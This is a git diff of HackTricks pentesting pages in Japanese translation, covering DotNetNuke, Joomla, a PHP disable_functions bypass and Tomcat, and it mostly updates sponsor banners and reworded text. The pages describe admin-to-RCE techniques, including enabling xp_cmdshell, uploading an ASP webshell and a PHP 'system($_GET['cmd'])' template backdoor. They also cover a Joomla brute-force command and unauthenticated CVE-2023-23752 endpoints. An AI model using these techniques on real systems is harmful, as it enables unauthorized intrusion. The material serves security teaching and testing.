{% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-services/gcp-databases-enum/gcp-firebase-enum" %}
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-ゼロからヒーローまでAWSハッキングを学ぶ htARTE(HackTricks AWS Red Team Expert)!
+Support HackTricks
-* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションを見つけます
-* [**公式PEASS&HackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れます
-* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**私をフォロー**してください 🐦[@carlospolopm](https://twitter.com/hacktricks_live)**。**
-* **ハッキングトリックを共有するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+{% endhint %}
diff --git a/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md b/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md
index dbf4ad7ce..c8c8ec9d2 100644
--- a/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md
+++ b/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md
@@ -1,60 +1,66 @@
# DotNetNuke (DNN)
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-ゼロからヒーローまでAWSハッキングを学ぶ htARTE(HackTricks AWS Red Team Expert)!
+Support HackTricks
-* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**してみたいですか?または、**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションです。
-* [**公式PEASS&HackTricksスウェグ**](https://peass.creator-spring.com)を手に入れましょう。
-* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**私をフォロー**してください 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
-* **ハッキングトリックを共有するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+{% endhint %}
## DotNetNuke (DNN)
-DNNの**管理者**としてログインすると、RCEを簡単に取得できます。
+DNNに**管理者**としてログインすると、RCEを取得するのが簡単です。
## RCE
### SQL経由
-**`Settings`**ページの下にアクセス可能なSQLコンソールがあり、**`xp_cmdshell`**を有効にして**オペレーティングシステムコマンドを実行**できます。
+**`Settings`**ページの下にSQLコンソールがアクセス可能で、**`xp_cmdshell`**を有効にして**オペレーティングシステムコマンドを実行**できます。
-これらの行を使用して**`xp_cmdshell`**を有効にします:
+**`xp_cmdshell`**を有効にするには、これらの行を使用します:
```sql
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
```
-そして、**"Run Script"**を押してそのSQL文を実行します。
+そして、**"Run Script"**を押して、そのSQL文を実行します。
-次に、以下のような方法でOSコマンドを実行します:
+次に、次のようなものを使用してOSコマンドを実行します:
```sql
xp_cmdshell 'whoami'
```
-### ASPウェブシェルを使用する
+### Via ASP webshell
-`Settings -> Security -> More -> More Security Settings`で、`Allowable File Extensions`の下に新しい許可された拡張子を**追加**し、`Save`ボタンをクリックします。
+`設定 -> セキュリティ -> その他 -> その他のセキュリティ設定` で、`許可されるファイル拡張子` の下に **新しい許可された拡張子を追加** できます。そして、`保存` ボタンをクリックします。
-**`asp`**または**`aspx`**を追加し、次に**`/admin/file-management`**に**`shell.asp`**などの**aspウェブシェル**をアップロードします。
+**`asp`** または **`aspx`** を追加し、次に **`/admin/file-management`** で **`shell.asp`** という名前の **asp webshell** をアップロードします。
-その後、**`/Portals/0/shell.asp`**にアクセスしてウェブシェルにアクセスします。
+その後、**`/Portals/0/shell.asp`** にアクセスして、webshell にアクセスします。
-### 特権昇格
+### Privilege Escalation
-**Potatoes**または**PrintSpoofer**などを使用して**特権を昇格**できます。
+**特権を昇格** させるために、例えば **Potatoes** または **PrintSpoofer** を使用できます。
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-htARTE(HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローまで学ぶ !
+Support HackTricks
-* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または**最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションを見つけます
-* [**公式PEASS&HackTricks swag**](https://peass.creator-spring.com)を手に入れます
-* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で私をフォローしてください 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **ハッキングトリックを共有するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください**。
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+{% endhint %}
diff --git a/network-services-pentesting/pentesting-web/joomla.md b/network-services-pentesting/pentesting-web/joomla.md
index 28e6db6da..3ad015863 100644
--- a/network-services-pentesting/pentesting-web/joomla.md
+++ b/network-services-pentesting/pentesting-web/joomla.md
@@ -1,20 +1,23 @@
# Joomla
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-ゼロからヒーローまでAWSハッキングを学ぶ htARTE(HackTricks AWS Red Team Expert)!
+Support HackTricks
-* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
-* [**公式PEASS&HackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れましょう
-* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**私をフォロー**してください 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
-* **ハッキングトリックを共有するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+{% endhint %}
-### Joomlaの統計情報
+### Joomlaの統計
-Joomlaは、Joomlaのインストールで使用されているJoomla、PHP、データベースバージョン、およびサーバーのオペレーティングシステムの分析など、いくつかの匿名の[使用統計情報](https://developer.joomla.org/about/stats.html)を収集しています。このデータは、彼らの公開[API](https://developer.joomla.org/about/stats/api.html)を介してクエリできます。
+Joomlaは、Joomlaのインストールで使用されているJoomla、PHP、データベースのバージョンやサーバーのオペレーティングシステムの内訳など、いくつかの匿名の[使用統計](https://developer.joomla.org/about/stats.html)を収集します。このデータは、彼らの公開[API](https://developer.joomla.org/about/stats/api.html)を介してクエリできます。
```bash
curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool
@@ -42,11 +45,11 @@ curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool
}
}
```
-## 列挙
+## Enumeration
-### 発見/フットプリンティング
+### Discovery/Footprinting
-* **meta**をチェック
+* **メタ**を確認する
```bash
curl https://www.joomla.org/ | grep Joomla | grep generator
@@ -63,52 +66,6 @@ curl https://www.joomla.org/ | grep Joomla | grep generator
[...]
```
* README.txt
-
-## Joomla
-
-### Information Gathering
-
-#### Version Detection
-
-To detect the version of Joomla running on a target website, you can look for version information in the HTML source code or check the `readme.html` file in the Joomla root directory.
-
-#### Directory Enumeration
-
-Use tools like DirBuster or Gobuster to enumerate directories and files on the Joomla website. Look for sensitive directories like `/administrator` or `/components`.
-
-### Exploitation
-
-#### Known Vulnerabilities
-
-Search for known vulnerabilities affecting the detected Joomla version on platforms like Exploit Database or CVE Details. Exploit these vulnerabilities to gain unauthorized access.
-
-#### SQL Injection
-
-Exploit SQL injection vulnerabilities in Joomla components or plugins to extract data from the website's database. Use tools like SQLMap to automate the process.
-
-### Post-Exploitation
-
-#### Privilege Escalation
-
-After gaining initial access, escalate privileges by exploiting misconfigurations, weak file permissions, or other vulnerabilities in the Joomla installation.
-
-#### Backdooring
-
-Plant a backdoor in the Joomla website to maintain access even if the original vulnerability used for exploitation is patched. Use tools like Metasploit to create and deploy backdoors.
-
-### Countermeasures
-
-#### Keep Joomla Updated
-
-Regularly update Joomla to the latest version to patch known vulnerabilities and protect the website from exploitation.
-
-#### Use Strong Authentication
-
-Implement strong authentication mechanisms like two-factor authentication to prevent unauthorized access to the Joomla admin panel.
-
-#### Monitor File Changes
-
-Monitor file integrity and changes in the Joomla installation to detect any unauthorized modifications or backdoors planted by attackers.
```
1- What is this?
* This is a Joomla! installation/upgrade package to version 3.x
@@ -118,26 +75,28 @@ Monitor file integrity and changes in the Joomla installation to detect any unau
```
### バージョン
-* **/administrator/manifests/files/joomla.xml** にバージョンが記載されています。
-* **/language/en-GB/en-GB.xml** にJoomlaのバージョンが記載されています。
-* **plugins/system/cache/cache.xml** におおよそのバージョンが記載されています。
+* **/administrator/manifests/files/joomla.xml** でバージョンを確認できます。
+* **/language/en-GB/en-GB.xml** でJoomlaのバージョンを取得できます。
+* **plugins/system/cache/cache.xml** でおおよそのバージョンを確認できます。
+
+### 自動
```bash
droopescan scan joomla --url http://joomla-site.local/
```
-In[ **80,443 - Pentesting Web Methodologyは、JoomlaをスキャンできるCMSスキャナに関するセクションです**](./#cms-scanners)。
+In[ **80,443 - Pentesting Web MethodologyはCMSスキャナーに関するセクションです**](./#cms-scanners)で、Joomlaをスキャンできます。
-### API認証なしの情報漏洩:
-バージョン4.0.0から4.2.7までが認証なしの情報漏洩(CVE-2023-23752)に脆弱であり、資格情報やその他の情報をダンプします。
+### API 認証なしの情報漏洩:
+バージョン4.0.0から4.2.7は、認証なしの情報漏洩(CVE-2023-23752)に脆弱で、クレデンシャルやその他の情報をダンプします。
-* ユーザー:`http:///api/v1/users?public=true`
+* ユーザー: `http:///api/v1/users?public=true`
-* 設定ファイル:`http:///api/index.php/v1/config/application?public=true`
+* 設定ファイル: `http:///api/index.php/v1/config/application?public=true`
-**MSFモジュール**:`scanner/http/joomla_api_improper_access_checks`またはrubyスクリプト:[51334](https://www.exploit-db.com/exploits/51334)
+**MSFモジュール**: `scanner/http/joomla_api_improper_access_checks` またはrubyスクリプト: [51334](https://www.exploit-db.com/exploits/51334)
### ブルートフォース
-ログインをブルートフォースするために、この[スクリプト](https://github.com/ajnik/joomla-bruteforce)を使用できます。
+この[スクリプト](https://github.com/ajnik/joomla-bruteforce)を使用して、ログインのブルートフォースを試みることができます。
```shell-session
sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
@@ -145,11 +104,26 @@ admin:admin
```
## RCE
-**管理者資格情報**を取得した場合、**PHPコードのスニペット**を追加して**RCE**を獲得できます。これは**テンプレート**を**カスタマイズ**することで行います。
+もし**管理者の資格情報**を取得できたら、**PHPコードのスニペット**を追加することで**RCEを実行**できます。これを**テンプレートをカスタマイズ**することで行います。
-1. `Configuration`の下にある**`Templates`**をクリックして、テンプレートメニューを表示します。
-2. `Template`列ヘッダーの下にある**`protostar`**を選択して、**`Templates: Customise`**ページに移動します。
-3. 最後に、**ページソース**を表示するためにページをクリックします。**`error.php`**ページを選択し、以下のように**PHPのワンライナーを追加**してコード実行を行います:
- - **`system($_GET['cmd']);`**
+1. `Configuration`の下にある左下の**`Templates`**を**クリック**して、テンプレートメニューを表示します。
+2. **テンプレート**名を**クリック**します。`Template`列の下にある**`protostar`**を選択しましょう。これで**`Templates: Customise`**ページに移動します。
+3. 最後に、ページを**クリック**して**ページソース**を表示できます。**`error.php`**ページを選びましょう。以下のように**コード実行を得るためのPHPワンライナー**を追加します:
+1. **`system($_GET['cmd']);`**
4. **保存して閉じる**
5. `curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id`
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
+
+
+Support HackTricks
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+{% endhint %}
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md
index 83d56ff52..6ac3396a3 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md
@@ -1,20 +1,23 @@
-# disable_functionsバイパス - PHP 7.0-7.4 (\*nixのみ)
+# disable\_functions bypass - PHP 7.0-7.4 (\*nix only)
+
+{% hint style="success" %}
+AWSハッキングを学び、実践する:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+GCPハッキングを学び、実践する:[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-htARTE(HackTricks AWS Red Team Expert) でAWSハッキングをゼロからヒーローまで学ぶ!
+HackTricksをサポートする
-* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つけます
-* [**公式PEASS&HackTricks swag**](https://peass.creator-spring.com)を手に入れます
-* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)に参加**または[Telegramグループ](https://t.me/peass)に参加し、**Twitter**で私をフォロー🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **ハッキングトリックを共有するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出**してください。
+* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
+* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
+* **ハッキングのトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
+{% endhint %}
-## PHP 7.0-7.4 (\*nixのみ)
+## PHP 7.0-7.4 (\*nix only)
-From [https://github.com/mm0r1/exploits/blob/master/php7-backtrace-bypass/exploit.php](https://github.com/mm0r1/exploits/blob/master/php7-backtrace-bypass/exploit.php)
+[https://github.com/mm0r1/exploits/blob/master/php7-backtrace-bypass/exploit.php](https://github.com/mm0r1/exploits/blob/master/php7-backtrace-bypass/exploit.php)から
```php
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+GCPハッキングを学び、実践する:[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-AWSハッキングをゼロからヒーローまで学ぶ htARTE(HackTricks AWS Red Team Expert)!
+HackTricksをサポートする
-* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
-* [**公式PEASS&HackTricksスウェグ**](https://peass.creator-spring.com)を手に入れましょう
-* **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で私をフォローする🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
-* **ハッキングトリックを共有するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
+* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
+* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
+* **ハッキングのトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
+{% endhint %}
diff --git a/network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md b/network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md
index 69aa3689e..2eb129354 100644
--- a/network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md
+++ b/network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md
@@ -1,16 +1,19 @@
-# 基本的なTomcat情報
+# Basic Tomcat Info
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-htARTE(HackTricks AWS Red Team Expert) でゼロからヒーローまでAWSハッキングを学びましょう!
+Support HackTricks
-* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
-* [**公式PEASS&HackTricksスウェグ**](https://peass.creator-spring.com)を手に入れましょう
-* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で私をフォローしてください 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
-* **ハッキングトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+{% endhint %}
**Try Hard Security Group**
@@ -20,9 +23,9 @@
***
-### rootでの実行を避ける
+### rootで実行しないようにする
-Tomcatをrootで実行しないようにするための非常に一般的な構成は、ポート80/443でApacheサーバーを設定し、リクエストされたパスが正規表現と一致する場合、リクエストを異なるポートで実行されているTomcatに送信することです。
+Tomcatをrootで実行しないための一般的な構成は、ポート80/443にApacheサーバーを設定し、要求されたパスが正規表現に一致する場合、リクエストを異なるポートで実行されているTomcatに送信することです。
### デフォルト構造
```
@@ -49,14 +52,14 @@ Tomcatをrootで実行しないようにするための非常に一般的な構
└── Catalina
└── localhost
```
-* `bin`フォルダには、Tomcatサーバーを起動および実行するために必要なスクリプトとバイナリが保存されています。
-* `conf`フォルダには、Tomcatが使用するさまざまな構成ファイルが保存されています。
-* `tomcat-users.xml`ファイルには、ユーザーの資格情報と割り当てられた役割が保存されています。
-* `lib`フォルダには、Tomcatの正しい動作に必要なさまざまなJARファイルが保存されています。
-* `logs`および`temp`フォルダには一時的なログファイルが保存されています。
-* `webapps`フォルダはTomcatのデフォルトのWebルートであり、すべてのアプリケーションがホストされています。`work`フォルダはキャッシュとして機能し、ランタイム中にデータを保存するために使用されます。
+* `bin`フォルダーには、Tomcatサーバーを起動および実行するために必要なスクリプトとバイナリが格納されています。
+* `conf`フォルダーには、Tomcatによって使用されるさまざまな設定ファイルが格納されています。
+* `tomcat-users.xml`ファイルには、ユーザーの資格情報とその割り当てられた役割が格納されています。
+* `lib`フォルダーには、Tomcatの正しい機能に必要なさまざまなJARファイルが保持されています。
+* `logs`および`temp`フォルダーには、一時的なログファイルが格納されています。
+* `webapps`フォルダーはTomcatのデフォルトのウェブルートであり、すべてのアプリケーションをホストします。`work`フォルダーはキャッシュとして機能し、実行時にデータを格納するために使用されます。
-`webapps`内の各フォルダには、次の構造が期待されています。
+`webapps`内の各フォルダーは、次の構造を持つことが期待されます。
```
webapps/customapp
├── images
@@ -73,10 +76,10 @@ webapps/customapp
└── classes
└── AdminServlet.class
```
-最も重要なファイルの1つは`WEB-INF/web.xml`で、デプロイメント記述子として知られています。このファイルには、アプリケーションで使用される**ルートに関する情報**やこれらのルートを処理するクラスに関する情報が格納されています。\
-アプリケーションで使用されるすべてのコンパイルされたクラスは`WEB-INF/classes`フォルダに保存する必要があります。これらのクラスには重要なビジネスロジックや機密情報が含まれている可能性があります。これらのファイルにおける脆弱性は、ウェブサイト全体の侵害につながる可能性があります。`lib`フォルダには、その特定のアプリケーションに必要なライブラリが保存されています。`jsp`フォルダには、[Jakarta Server Pages (JSP)](https://en.wikipedia.org/wiki/Jakarta\_Server\_Pages)(以前は`JavaServer Pages`として知られていました)が保存されており、Apacheサーバー上のPHPファイルに比較できます。
+最も重要なファイルは `WEB-INF/web.xml` で、これはデプロイメント記述子として知られています。このファイルは、アプリケーションで使用される**ルートに関する情報**と、これらのルートを処理するクラスを保存します。\
+アプリケーションで使用されるすべてのコンパイル済みクラスは `WEB-INF/classes` フォルダーに保存されるべきです。これらのクラスには重要なビジネスロジックや機密情報が含まれている可能性があります。これらのファイルに脆弱性があると、ウェブサイトの完全な侵害につながる可能性があります。`lib` フォルダーには、その特定のアプリケーションに必要なライブラリが保存されています。`jsp` フォルダーには、以前は `JavaServer Pages` として知られていた [Jakarta Server Pages (JSP)](https://en.wikipedia.org/wiki/Jakarta\_Server\_Pages) が保存されており、Apacheサーバー上のPHPファイルに比較できます。
-以下は**web.xml**ファイルの例です。
+ここに例として**web.xml**ファイルがあります。
```xml
@@ -94,15 +97,15 @@ webapps/customapp
```
-上記の`web.xml`構成は、**`AdminServlet`という新しいサーブレット**を定義し、**`com.inlanefreight.api.AdminServlet`クラス**にマップされています。Javaはパッケージ名を作成するためにドット表記を使用します。したがって、上記で定義されたクラスのディスク上のパスは次のとおりです:
+The `web.xml` 設定は **`AdminServlet`** という **新しいサーブレット** を定義しており、これは **`com.inlanefreight.api.AdminServlet`** クラスにマッピングされています。Javaはドット表記を使用してパッケージ名を作成するため、上記で定義されたクラスのディスク上のパスは次のようになります:
* **`classes/com/inlanefreight/api/AdminServlet.class`**
-次に、**`/admin`へのリクエストを`AdminServlet`にマッピングする**新しいサーブレットマッピングが作成されます。この構成により、**`/admin`への受信リクエストは`AdminServlet.class`クラスに送信**され、処理されます。**`web.xml`**記述子には多くの**機密情報**が含まれており、**ローカルファイルインクルージョン(LFI)脆弱性**を利用する際にチェックする重要なファイルです。
+次に、**`/admin`** へのリクエストを **`AdminServlet`** にマッピングするための新しいサーブレットマッピングが作成されます。この設定により、**`/admin`** に対して受信したリクエストはすべて **`AdminServlet.class`** クラスに送信され、処理されます。**`web.xml`** ディスクリプタには多くの **機密情報** が含まれており、**Local File Inclusion (LFI) 脆弱性** を利用する際に確認すべき重要なファイルです。
### tomcat-users
-**`tomcat-users.xml`**ファイルは、**`/manager`および`host-manager`管理ページ**へのアクセスを**許可**または拒否するために使用されます。
+**`tomcat-users.xml`** ファイルは **`/manager` と `host-manager` 管理ページ** へのアクセスを **許可** または **拒否** するために使用されます。
```xml
@@ -143,7 +146,7 @@ will also need to set the passwords to something appropriate.
```
-ファイルには、`manager-gui`、`manager-script`、`manager-jmx`、`manager-status` のそれぞれがアクセス権を提供する内容が示されています。この例では、パスワードが `tomcat` のユーザー `tomcat` が `manager-gui` ロールを持っており、2番目の弱いパスワード `admin` がユーザーアカウント `admin` に設定されています。
+ファイルは、`manager-gui`、`manager-script`、`manager-jmx`、および `manager-status` の各役割がどのようなアクセスを提供するかを示しています。この例では、ユーザー `tomcat` がパスワード `tomcat` で `manager-gui` 役割を持ち、ユーザーアカウント `admin` に対しては、2つ目の弱いパスワード `admin` が設定されていることがわかります。
## 参考文献
@@ -155,14 +158,17 @@ will also need to set the passwords to something appropriate.
{% embed url="https://discord.gg/tryhardsecurity" %}
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-htARTE (HackTricks AWS Red Team Expert) でゼロからヒーローまでAWSハッキングを学びましょう!
